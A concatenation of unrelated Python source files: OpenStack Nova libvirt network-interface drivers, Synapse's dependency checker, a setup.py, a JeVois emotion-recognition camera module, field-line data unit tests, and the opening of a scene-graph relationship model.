conf.filtername = "nova-instance-" + instance['name'] + "-" + mac_id
conf.add_filter_param("IP", mapping['ips'][0]['ip'])
if mapping['dhcp_server']:
conf.add_filter_param("DHCPSERVER", mapping['dhcp_server'])
if FLAGS.use_ipv6:
conf.add_filter_param("RASERVER",
mapping.get('gateway_v6') + "/128")
if FLAGS.allow_same_net_traffic:
net, mask = netutils.get_net_and_mask(network['cidr'])
conf.add_filter_param("PROJNET", net)
conf.add_filter_param("PROJMASK", mask)
if FLAGS.use_ipv6:
net_v6, prefixlen_v6 = netutils.get_net_and_prefixlen(
network['cidr_v6'])
conf.add_filter_param("PROJNET6", net_v6)
conf.add_filter_param("PROJMASK6", prefixlen_v6)
return conf
def plug(self, instance, vif):
"""Ensure that the bridge exists, and add VIF to it."""
network, mapping = vif
if (not network.get('multi_host') and
mapping.get('should_create_bridge')):
if mapping.get('should_create_vlan'):
iface = FLAGS.vlan_interface or network['bridge_interface']
LOG.debug(_('Ensuring vlan %(vlan)s and bridge %(bridge)s'),
{'vlan': network['vlan'],
'bridge': network['bridge']},
instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan_bridge(
network['vlan'],
network['bridge'],
iface)
else:
iface = FLAGS.flat_interface or network['bridge_interface']
LOG.debug(_("Ensuring bridge %s"), network['bridge'],
instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_bridge(
network['bridge'],
iface)
return self._get_configurations(instance, network, mapping)
def unplug(self, instance, vif):
"""No manual unplugging required."""
pass
class LibvirtOpenVswitchDriver(vif.VIFDriver):
"""VIF driver for Open vSwitch that uses libivrt type='ethernet'
Used for libvirt versions that do not support
OVS virtual port XML (0.9.10 or earlier).
"""
def get_dev_name(self, iface_id):
return ("tap" + iface_id)[:LINUX_DEV_LEN]
def create_ovs_vif_port(self, dev, iface_id, mac, instance_id):
utils.execute('ovs-vsctl', '--', '--may-exist', 'add-port',
FLAGS.libvirt_ovs_bridge, dev,
'--', 'set', 'Interface', dev,
'external-ids:iface-id=%s' % iface_id,
'external-ids:iface-status=active',
'external-ids:attached-mac=%s' % mac,
'external-ids:vm-uuid=%s' % instance_id,
run_as_root=True)
def delete_ovs_vif_port(self, dev):
utils.execute('ovs-vsctl', 'del-port', FLAGS.libvirt_ovs_bridge,
dev, run_as_root=True)
utils.execute('ip', 'link', 'delete', dev, run_as_root=True)
def plug(self, instance, vif):
network, mapping = vif
iface_id = mapping['vif_uuid']
dev = self.get_dev_name(iface_id)
if not linux_net._device_exists(dev):
# Older version of the command 'ip' from the iproute2 package
# don't have support for the tuntap option (lp:882568). If it
# turns out we're on an old version we work around this by using
# tunctl.
try:
# First, try with 'ip'
utils.execute('ip', 'tuntap', 'add', dev, 'mode', 'tap',
run_as_root=True)
except exception.ProcessExecutionError:
# Second option: tunctl
utils.execute('tunctl', '-b', '-t', dev, run_as_root=True)
utils.execute('ip', 'link', 'set', dev, 'up', run_as_root=True)
self.create_ovs_vif_port(dev, iface_id, mapping['mac'],
instance['uuid'])
conf = config.LibvirtConfigGuestInterface()
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
conf.net_type = "ethernet"
conf.target_dev = dev
conf.script = ""
conf.mac_addr = mapping['mac']
return conf
def unplug(self, instance, vif):
"""Unplug the VIF by deleting the port from the bridge."""
try:
network, mapping = vif
self.delete_ovs_vif_port(self.get_dev_name(mapping['vif_uuid']))
except exception.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
class LibvirtHybridOVSBridgeDriver(LibvirtBridgeDriver,
LibvirtOpenVswitchDriver):
"""VIF driver that uses OVS + Linux Bridge for iptables compatibility.
Enables the use of OVS-based Quantum plugins while at the same
time using iptables-based filtering, which requires that vifs be
plugged into a linux bridge, not OVS. IPtables filtering is useful for
in particular for Nova security groups.
"""
def get_br_name(self, iface_id):
return ("qbr" + iface_id)[:LINUX_DEV_LEN]
def get_veth_pair_names(self, iface_id):
return (("qvb%s" % iface_id)[:LINUX_DEV_LEN],
("qvo%s" % iface_id)[:LINUX_DEV_LEN])
def plug(self, instance, vif):
"""Plug using hybrid strategy
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal OVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms
"""
network, mapping = vif
iface_id = mapping['vif_uuid']
br_name = self.get_br_name(iface_id)
v1_name, v2_name = self.get_veth_pair_names(iface_id)
if not linux_net._device_exists(br_name):
utils.execute('brctl', 'addbr', br_name, run_as_root=True)
if not linux_net._device_exists(v2_name):
linux_net._create_veth_pair(v1_name, v2_name)
utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
self.create_ovs_vif_port(v2_name, iface_id, mapping['mac'],
instance['uuid'])
network['bridge'] = br_name
return self._get_configurations(instance, network, mapping)
def unplug(self, instance, vif):
"""UnPlug using hybrid strategy
Unhook port from OVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
try:
network, mapping = vif
iface_id = mapping['vif_uuid']
br_name = self.get_br_name(iface_id)
v1_name, v2_name = self.get_veth_pair_names(iface_id)
utils.execute('brctl', 'delif', br_name, v1_name, run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name, run_as_root=True)
self.delete_ovs_vif_port(v2_name)
except exception.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
class LibvirtOpenVswitchVirtualPortDriver(vif.VIFDriver):
"""VIF driver for Open vSwitch that uses integrated libvirt
OVS virtual port XML (introduced in libvirt 0.9.11)."""
def plug(self, instance, vif):
""" Pass data required to create OVS virtual port element"""
network, mapping = vif
conf = config.LibvirtConfigGuestInterface()
conf.net_type = "bridge"
conf.source_dev = FLAGS.libvirt_ovs_bridge
conf.mac_addr = mapping['mac']
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid", mapping['vif_uuid'])
return conf
def unplug(self, instance, vif):
"""No action needed. Libvirt takes care of cleanup"""
pass
class QuantumLinuxBridgeVIFDriver(vif.VIFDriver):
"""VIF driver for Linux Bridge when running Quantum."""
def get_dev_name(self, iface_id):
return ("tap" + iface_id)[:LINUX_DEV_LEN]
def plug(self, instance, vif):
network, mapping = vif
iface_id = mapping['vif_uuid']
dev = self.get_dev_name(iface_id)
if FLAGS.libvirt_type != 'xen':
linux_net.QuantumLinuxBridgeInterfaceDriver.create_tap_dev(dev)
conf = config.LibvirtConfigGuestInterface()
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = 'virtio'
conf.net_type = "ethernet"
conf.target_dev = dev
conf.script = ""
conf.mac_addr = mapping['mac']
return conf
def unplug(self, instance, vif):
"""Unplug the VIF by deleting the port from the bridge."""
network, mapping = vif
dev = self.get_dev_name(mapping['vif_uuid'])
try:
utils.execute('ip', 'link', 'delete', dev, run_as_root=True)
except exception.ProcessExecutionError:
LOG.warning(_("Failed while unplugging vif"), instance=instance)
raise
|
py | 7dfa78dadb8b0f15edafd8e04529952fa85ba8a2 | # Copyright 2015, 2016 OpenMarket Ltd
# Copyright 2017 Vector Creations Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from pkg_resources import (
DistributionNotFound,
Requirement,
VersionConflict,
get_provider,
)
logger = logging.getLogger(__name__)
# REQUIREMENTS is a simple list of requirement specifiers[1], and must be
# installed. It is passed to setup() as install_requires in setup.py.
#
# CONDITIONAL_REQUIREMENTS is the optional dependencies, represented as a dict
# of lists. The dict key is the optional dependency name and can be passed to
# pip when installing. The list is a series of requirement specifiers[1] to be
# installed when that optional dependency requirement is specified. It is passed
# to setup() as extras_require in setup.py
#
# [1] https://pip.pypa.io/en/stable/reference/pip_install/#requirement-specifiers.
REQUIREMENTS = [
"jsonschema>=2.5.1",
"frozendict>=1",
"unpaddedbase64>=1.1.0",
"canonicaljson>=1.1.3",
"signedjson>=1.0.0",
"pynacl>=1.2.1",
"idna>=2",
# validating SSL certs for IP addresses requires service_identity 18.1.
"service_identity>=18.1.0",
# our logcontext handling relies on the ability to cancel inlineCallbacks
# (https://twistedmatrix.com/trac/ticket/4632) which landed in Twisted 18.7.
"Twisted>=18.7.0",
"treq>=15.1",
# Twisted has required pyopenssl 16.0 since about Twisted 16.6.
"pyopenssl>=16.0.0",
"pyyaml>=3.11",
"pyasn1>=0.1.9",
"pyasn1-modules>=0.0.7",
"daemonize>=2.3.1",
"bcrypt>=3.1.0",
"pillow>=4.3.0",
"sortedcontainers>=1.4.4",
"psutil>=2.0.0",
"pymacaroons>=0.13.0",
"msgpack>=0.5.0",
"phonenumbers>=8.2.0",
"six>=1.10",
# prometheus_client 0.4.0 changed the format of counter metrics
# (cf https://github.com/matrix-org/synapse/issues/4001)
"prometheus_client>=0.0.18,<0.4.0",
# we use attr.s(slots), which arrived in 16.0.0
# Twisted 18.7.0 requires attrs>=17.4.0
"attrs>=17.4.0",
"netaddr>=0.7.18",
]
CONDITIONAL_REQUIREMENTS = {
"email": ["Jinja2>=2.9", "bleach>=1.4.3"],
"matrix-synapse-ldap3": ["matrix-synapse-ldap3>=0.1"],
# we use execute_batch, which arrived in psycopg 2.7.
"postgres": ["psycopg2>=2.7"],
# ConsentResource uses select_autoescape, which arrived in jinja 2.9
"resources.consent": ["Jinja2>=2.9"],
# ACME support is required to provision TLS certificates from authorities
# that use the protocol, such as Let's Encrypt.
"acme": [
"txacme>=0.9.2",
# txacme depends on eliot. Eliot 1.8.0 is incompatible with
# python 3.5.2, as per https://github.com/itamarst/eliot/issues/418
'eliot<1.8.0;python_version<"3.5.3"',
],
"saml2": ["pysaml2>=4.5.0"],
"systemd": ["systemd-python>=231"],
"url_preview": ["lxml>=3.5.0"],
"test": ["mock>=2.0", "parameterized"],
"sentry": ["sentry-sdk>=0.7.2"],
}
ALL_OPTIONAL_REQUIREMENTS = set()
for name, optional_deps in CONDITIONAL_REQUIREMENTS.items():
# Exclude systemd as it's a system-based requirement.
if name not in ["systemd"]:
ALL_OPTIONAL_REQUIREMENTS = set(optional_deps) | ALL_OPTIONAL_REQUIREMENTS
def list_requirements():
return list(set(REQUIREMENTS) | ALL_OPTIONAL_REQUIREMENTS)
class DependencyException(Exception):
@property
def message(self):
return "\n".join([
"Missing Requirements: %s" % (", ".join(self.dependencies),),
"To install run:",
" pip install --upgrade --force %s" % (" ".join(self.dependencies),),
"",
])
@property
def dependencies(self):
for i in self.args[0]:
yield "'" + i + "'"
def check_requirements(for_feature=None):
deps_needed = []
errors = []
if for_feature:
reqs = CONDITIONAL_REQUIREMENTS[for_feature]
else:
reqs = REQUIREMENTS
for dependency in reqs:
try:
_check_requirement(dependency)
except VersionConflict as e:
deps_needed.append(dependency)
errors.append(
"Needed %s, got %s==%s"
% (dependency, e.dist.project_name, e.dist.version)
)
except DistributionNotFound:
deps_needed.append(dependency)
errors.append("Needed %s but it was not installed" % (dependency,))
if not for_feature:
# Check the optional dependencies are up to date. We allow them to not be
# installed.
OPTS = sum(CONDITIONAL_REQUIREMENTS.values(), [])
for dependency in OPTS:
try:
_check_requirement(dependency)
except VersionConflict as e:
deps_needed.append(dependency)
errors.append(
"Needed optional %s, got %s==%s"
% (dependency, e.dist.project_name, e.dist.version)
)
except DistributionNotFound:
# If it's not found, we don't care
pass
if deps_needed:
for e in errors:
logging.error(e)
raise DependencyException(deps_needed)
def _check_requirement(dependency_string):
"""Parses a dependency string, and checks if the specified requirement is installed
Raises:
VersionConflict if the requirement is installed, but with the the wrong version
DistributionNotFound if nothing is found to provide the requirement
"""
req = Requirement.parse(dependency_string)
# first check if the markers specify that this requirement needs installing
if req.marker is not None and not req.marker.evaluate():
# not required for this environment
return
get_provider(req)
if __name__ == "__main__":
import sys
sys.stdout.writelines(req + "\n" for req in list_requirements())
|
py | 7dfa78e02877b492086b6b9d04491180a1df79ca | from os import path
from setuptools import setup, find_packages
import sys
import versioneer
# NOTE: This file must remain Python 2 compatible for the foreseeable future,
# to ensure that we error out properly for people with outdated setuptools
# and/or pip.
min_version = (3, 6)
if sys.version_info < min_version:
error = """
xview does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
sys.exit(error)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as requirements_file:
# Parse requirements.txt, ignoring any commented-out lines.
requirements = [line for line in requirements_file.read().splitlines()
if not line.startswith('#')]
setup(
name='xview',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="ISS data visualisation",
long_description=readme,
author="Brookhaven National Laboratory",
author_email='[email protected]',
url='https://github.com/elistavitski/xview',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
# 'command = some.module:some_function',
],
},
include_package_data=True,
package_data={
'xview': [
'xview/spectra_db/*.json',
'xview/ui/*.ui',
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
)
|
py | 7dfa79e8185e92bcfb63646c1281be51ebdab336 | import libjevois as jevois
import cv2 as cv
import numpy as np
## Detect face emotions and send over serial
#
# Add some description of your module here.
#
# @author pepelepoisson
#
# @videomapping YUYV 320 240 30 YUYV 320 240 30 PapasInventeurs Nunchi
# @email [email protected]
# @address 123 first street, Los Angeles CA 90012, USA
# @copyright Copyright (C) 2018 by pepelepoisson
# @mainurl http://pcube.ca
# @supporturl http://pcube.ca
# @otherurl http://pcube.ca
# @license GPL
# @distribution Unrestricted
# @restrictions None
# @ingroup modules
class Nunchi:
# ####################################################################################################
## Constructor
def __init__(self):
self.inpWidth = 64 # Resized image width passed to network
self.inpHeight = 64 # Resized image height passed to network
self.scale = 1.0 # Value scaling factor applied to input pixels
self.mean = [127,127,127] # Mean BGR value subtracted from input image
self.rgb = False # True if model expects RGB inputs, otherwise it expects BGR
# This network takes a while to load from microSD. To avoid timouts at construction,
# we will load it in process() instead.
self.timer = jevois.Timer('Neural emotion', 10, jevois.LOG_DEBUG)
self.frame = 0 # a simple frame counter used to demonstrate sendSerial()
# ####################################################################################################
# ###################################################################################################
## Process function with no USB output
#def processNoUSB(self, inframe):
# jevois.sendSerial("process no usb not implemented");
# jevois.LFATAL("process no usb not implemented")
def processNoUSB(self, inframe):
font = cv.FONT_HERSHEY_PLAIN
siz = 0.8
white = (255, 255, 255)
# Load the network if needed:
if not hasattr(self, 'net'):
backend = cv.dnn.DNN_BACKEND_DEFAULT
target = cv.dnn.DNN_TARGET_CPU
self.classes = [ "neutral", "happiness", "surprise", "sadness", "anger", "disgust",
"fear", "contempt" ]
self.model = 'FER+ ONNX'
self.net = cv.dnn.readNet('/jevois/share/opencv-dnn/classification/emotion_ferplus.onnx', '')
self.net.setPreferableBackend(cv.dnn.DNN_BACKEND_DEFAULT)
self.net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
# Get the next frame from the camera sensor:
frame = inframe.getCvBGR()
self.timer.start()
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
#mid = int((frameWidth - 110) / 2) + 110 # x coord of midpoint of our bars
#leng = frameWidth - mid - 6 # max length of our bars
maxconf = 999
# Create a 4D blob from a frame.
gframe = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
blob = cv.dnn.blobFromImage(gframe, self.scale, (self.inpWidth, self.inpHeight), self.mean, self.rgb, crop=True)
# Run the model
self.net.setInput(blob)
out = self.net.forward()
# Show the scores for each class:
out = out.flatten()
# Create dark-gray (value 80) image for the bottom panel, 96 pixels tall and show top-1 class:
#msgbox = np.zeros((96, frame.shape[1], 3), dtype = np.uint8) + 80
jevois.sendSerial('> mood: '+str(round(out[0]*100,2)) + ' ' + str(round(out[1]*100,2)) + ' ' +str(round(out[2]*100,2))+' '+str(round(out[3]*100,2)) + ' ' + str(round(out[4]*100,2)) + ' ' +str(round(out[5]*100,2)) + ' ' + str(round(out[6]*100,2)) + ' ' +str(round(out[7]*100,2)));
#jevois.sendSerial("Getting up to this point");
#jevois.LFATAL("process no usb not implemented")
## JeVois noUSB processing function
# ###################################################################################################
## JeVois main processing function
def process(self, inframe, outframe):
font = cv.FONT_HERSHEY_PLAIN
siz = 0.8
white = (255, 255, 255)
# Load the network if needed:
if not hasattr(self, 'net'):
backend = cv.dnn.DNN_BACKEND_DEFAULT
target = cv.dnn.DNN_TARGET_CPU
self.classes = [ "neutral", "happiness", "surprise", "sadness", "anger", "disgust",
"fear", "contempt" ]
self.model = 'FER+ ONNX'
self.net = cv.dnn.readNet('/jevois/share/opencv-dnn/classification/emotion_ferplus.onnx', '')
self.net.setPreferableBackend(cv.dnn.DNN_BACKEND_DEFAULT)
self.net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
# Get the next frame from the camera sensor:
frame = inframe.getCvBGR()
self.timer.start()
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
mid = int((frameWidth - 110) / 2) + 110 # x coord of midpoint of our bars
leng = frameWidth - mid - 6 # max length of our bars
maxconf = 999
# Create a 4D blob from a frame.
gframe = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
blob = cv.dnn.blobFromImage(gframe, self.scale, (self.inpWidth, self.inpHeight), self.mean, self.rgb, crop=True)
# Run the model
self.net.setInput(blob)
out = self.net.forward()
# Create dark-gray (value 80) image for the bottom panel, 96 pixels tall and show top-1 class:
msgbox = np.zeros((96, frame.shape[1], 3), dtype = np.uint8) + 80
# Show the scores for each class:
out = out.flatten()
for i in range(8):
conf = out[i] * 100
#jevois.sendSerial(self.classes[i] + ':'+ str(conf));
if conf > maxconf: conf = maxconf
if conf < -maxconf: conf = -maxconf
cv.putText(msgbox, self.classes[i] + ':', (3, 11*(i+1)), font, siz, white, 1, cv.LINE_AA)
rlabel = '%+6.1f' % conf
cv.putText(msgbox, rlabel, (76, 11*(i+1)), font, siz, white, 1, cv.LINE_AA)
cv.line(msgbox, (mid, 11*i+6), (mid + int(conf*leng/maxconf), 11*i+6), white, 4)
#jevois.sendSerial(self.classes[i] + ':', (3, 11*(i+1)), font, siz, white, 1, cv.LINE_AA);
jevois.sendSerial('> mood: '+str(round(out[0]*100,2)) + ' ' + str(round(out[1]*100,2)) + ' ' +str(round(out[2]*100,2))+' '+str(round(out[3]*100,2)) + ' ' + str(round(out[4]*100,2)) + ' ' +str(round(out[5]*100,2)) + ' ' + str(round(out[6]*100,2)) + ' ' +str(round(out[7]*100,2)));
# Put efficiency information.
cv.putText(frame, 'JeVois Nunchi - ' + self.model, (3, 15),
cv.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 1, cv.LINE_AA)
t, _ = self.net.getPerfProfile()
fps = self.timer.stop()
label = fps + ', %dms' % (t * 1000.0 / cv.getTickFrequency())
cv.putText(frame, label, (3, frameHeight-5), cv.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 1, cv.LINE_AA)
# Stack bottom panel below main image:
frame = np.vstack((frame, msgbox))
# Send output frame to host:
outframe.sendCv(frame)
# Send a string over serial (e.g., to an Arduino). Remember to tell the JeVois Engine to display those messages,
# as they are turned off by default. For example: 'setpar serout All' in the JeVois console:
#jevois.sendSerial("DONE frame {}".format(self.frame));
#self.frame += 1
## JeVois main processing function
|
py | 7dfa7b7dfeee3699a0b58b927370c0384fc752b4 | # -*- coding: utf-8 -*-
"""
Created on Tue June 22 2021
@author: lordofbejgli
"""
import unittest
import os
import re
import numpy as np
from flap_field_lines.field_line_handler import *
try:
from ..config import data_path
except ImportError:
from ..config_default import data_path
class TestLoadingData(unittest.TestCase):
"""
This is a series of tests the check the behaviour of FieldLineHandler's
constructor. The test data is not present in the repo, for test files are
massive. These tests are skipped if the path given for test data does not
exist. To run them, first obtain flux surface files for then'EIM' W7X
magnetic configuration and adjust the setUp() method to point to their
location.
"""
#Give flux surface files location here
def setUp(self) -> None:
"""
Test initiation. Initializes a few parameters of the reading. Lines are
chose with multiple selection, while the toroidal coordinate selection
is given as a range.
"""
self.lines = (5, 60, 120, 240)
self.tor_range = '0:500:50'
self.handler = FieldLineHandler(data_path, configuration='EIM')
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_reading_all_lines(self):
"""
Reading all lines from flux surface file.
"""
self.handler.update_read_parameters(surfaces=30)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 360, 3651))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_reading_all_by_using_colon(self):
"""
Testing the use of ':' as a selector.
"""
number_of_surfs = len([name for name in os.listdir(self.handler.path)
if name.count('field_lines_tor_ang') > 0
and re.search(r'_v[0-9].sav', name) is None])
self.handler.update_read_parameters(surfaces=':')
self.assertEqual(number_of_surfs,len(self.handler.surfaces))
self.handler.update_read_parameters(surfaces=30, lines=':', tor_range=':')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 360, 3651))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_directions(self):
"""
These tests check the reading of field lines in various directions.
"""
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range=self.tor_range, direction='backward')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range=self.tor_range, direction='both')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
field_lines = self.handler.return_field_lines()
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range='-1:-500:-50', direction='backward')
self.handler.load_data()
self.assertTrue(np.array_equal(field_lines, self.handler.return_field_lines()))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_multiple_files(self):
"""
Checks reading from multiple files. Also tests correct behaviour if
some files are not found. Checks if fs_info is properly read.
"""
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(97, 30, 98), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10))
self.handler.update_read_parameters(surfaces=40, lines=self.lines,
tor_range=self.tor_range, drop_data=False)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces="30:41:10", lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
fs_info = self.handler.return_fs_info()
self.assertTrue(np.array_equal(fs_info['separatrix'], [83, 43, 55, 65, 76, 87]))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_B_gradB(self):
"""
Checks reading B and gradB.
"""
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True, getGradB=True)
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
|
py | 7dfa7cfa68d826aa8b9a1c3fa184801fdd079c67 | '''
Created on Aug 9, 2009
@author: aleksandrcicenin
'''
|
py | 7dfa7ecfaa4b68516527d63cd5f2714e10c77668 | """
Let's get the relationships yo
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
from torch.autograd import Variable
from torch.nn import functional as F
from torch.nn.utils.rnn import PackedSequence
#from lib.resnet import resnet_l4
from config import BATCHNORM_MOMENTUM
from lib.fpn.nms.functions.nms import apply_nms
# from lib.decoder_rnn import DecoderRNN, lstm_factory, LockedDropout
from lib.lstm.decoder_rnn import DecoderRNN
#from lib.lstm.decoder_rnn_bg import DecoderRNN
from lib.lstm.highway_lstm_cuda.alternating_highway_lstm import AlternatingHighwayLSTM
from lib.fpn.box_utils import bbox_overlaps, center_size
from lib.get_union_boxes import UnionBoxesAndFeats
from lib.fpn.proposal_assignments.rel_assignments import rel_assignments
from lib.object_detector import ObjectDetector, gather_res, load_vgg, load_resnet
from lib.pytorch_misc import transpose_packed_sequence_inds, to_onehot, arange, enumerate_by_image, diagonal_inds, Flattener
from lib.sparse_targets import FrequencyBias
from lib.surgery import filter_dets
from lib.word_vectors import obj_edge_vectors
from lib.fpn.roi_align.functions.roi_align import RoIAlignFunction
from lib.gcn.pygcn import GraphConvolution
from lib.gcn.pygat import GraphAttentionLayer
from lib.lstm.mu_rnn import MultiLabelRNN
from lib.pytorch_misc import random_choose
import math
from lib.gcn.gat_model import GAT
from lib.sqrtm import sqrtm
def _sort_by_score(im_inds, scores):
"""
We'll sort everything scorewise from Hi->low, BUT we need to keep images together
and sort LSTM from l
:param im_inds: Which im we're on
:param scores: Goodness ranging between [0, 1]. Higher numbers come FIRST
:return: Permutation to put everything in the right order for the LSTM
Inverse permutation
Lengths for the TxB packed sequence.
"""
num_im = im_inds[-1] + 1
rois_per_image = scores.new(num_im)
lengths = []
for i, s, e in enumerate_by_image(im_inds):
rois_per_image[i] = 2 * (s - e) * num_im + i
lengths.append(e - s)
lengths = sorted(lengths, reverse=True)
inds, ls_transposed = transpose_packed_sequence_inds(lengths) # move it to TxB form
inds = torch.LongTensor(inds).cuda(im_inds.get_device())
# ~~~~~~~~~~~~~~~~
# HACKY CODE ALERT!!!
# we're sorting by confidence which is in the range (0,1), but more importantly by longest
# img....
# ~~~~~~~~~~~~~~~~
roi_order = scores - 2 * rois_per_image[im_inds]
_, perm = torch.sort(roi_order, 0, descending=True)
perm = perm[inds]
_, inv_perm = torch.sort(perm)
return perm, inv_perm, ls_transposed
MODES = ('sgdet', 'sgcls', 'predcls', 'predcls_nongtbox', 'detclass')
class LinearizedContext(nn.Module):
"""
Module for computing the object contexts and edge contexts
"""
def __init__(self, classes, rel_classes, mode='sgdet',
embed_dim=200, hidden_dim=256, obj_dim=2048, pooling_dim=2048,
nl_mul=0, nl_obj=2, nl_obj_gcn=2, nl_edge=2, nl_adj=1, dropout_rate=0.2, order='confidence',
pass_in_obj_feats_to_decoder=True,
pass_in_obj_feats_to_edge=True,
pass_in_obj_feats_to_gcn=False,
pass_embed_togcn=False,
attention_dim=256, with_adj_mat=False,
max_num_obj=65, adj_embed_dim=256, mean_union_feat=False, adj_embed=False,
ch_res=False, use_bias=True, use_tanh=True,
limit_vision=True, use_vision=True,
bg_num_rel=-1, bg_num_graph=-1,
with_gcn=False, fb_thr=0.5, with_biliner_score=False,
gcn_adj_type='hard', num_gcn_layer=1, relu_alpha=0.2,
nhead=4, where_gcn=False, with_gt_adj_mat=False, type_gcn='normal',
edge_ctx_type='obj', nms_union=False):
super(LinearizedContext, self).__init__()
self.classes = classes
self.rel_classes = rel_classes
assert mode in MODES
self.mode = mode
self.attention_dim = attention_dim
self.nl_mul = nl_mul
self.nl_obj = nl_obj
self.nl_obj_gcn = nl_obj_gcn
self.nl_adj = nl_adj
self.nl_edge = nl_edge
self.with_adj_mat = with_adj_mat
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.obj_dim = obj_dim
self.pooling_dim = pooling_dim
self.dropout_rate = dropout_rate
self.pass_in_obj_feats_to_decoder = pass_in_obj_feats_to_decoder
self.pass_in_obj_feats_to_edge = pass_in_obj_feats_to_edge
self.pass_in_obj_feats_to_gcn = pass_in_obj_feats_to_gcn
self.pass_embed_togcn = pass_embed_togcn
